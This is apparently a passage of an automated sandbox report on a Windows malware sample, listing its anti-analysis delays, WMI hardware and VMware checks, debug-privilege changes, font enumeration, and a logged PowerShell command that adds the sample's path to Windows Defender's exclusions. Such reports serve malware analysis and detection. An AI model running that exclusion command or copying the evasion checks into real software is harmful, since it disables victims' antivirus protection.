Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1195656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1195547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1195438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1195297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1195171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1194837s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1194724s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1194609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1194500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1194360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1194249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1194141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1194016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1193907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1193782s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199891	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199766	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199641	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199531	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199422	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199313	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199188	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199063	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198953	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198844	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198719	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198610	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198485	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198360	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198235	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198110	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197985	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197871	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197747	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197478	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197369	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197250	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197141	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197031	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196922	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196812	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196702	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196578	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196469	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196360	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196235	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196110	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195985	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195875	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195766	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195656	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195547	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195438	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195297	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195171	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194837	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194724	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194609	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194500	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194360	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194249	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194141	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194016	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1193907	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1193782	Jump to behavior

Source: wKmhzHd4MC.exe, 00000004.00000002.2967351577.0000000000EF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2U
Source: wKmhzHd4MC.exe, 00000000.00000002.1756093959.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Pe
Source: wKmhzHd4MC.exe, 00000000.00000002.1756093959.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe"
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe"			Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe"			Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process created: C:\Users\user\Desktop\wKmhzHd4MC.exe "C:\Users\user\Desktop\wKmhzHd4MC.exe"			Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Users\user\Desktop\wKmhzHd4MC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
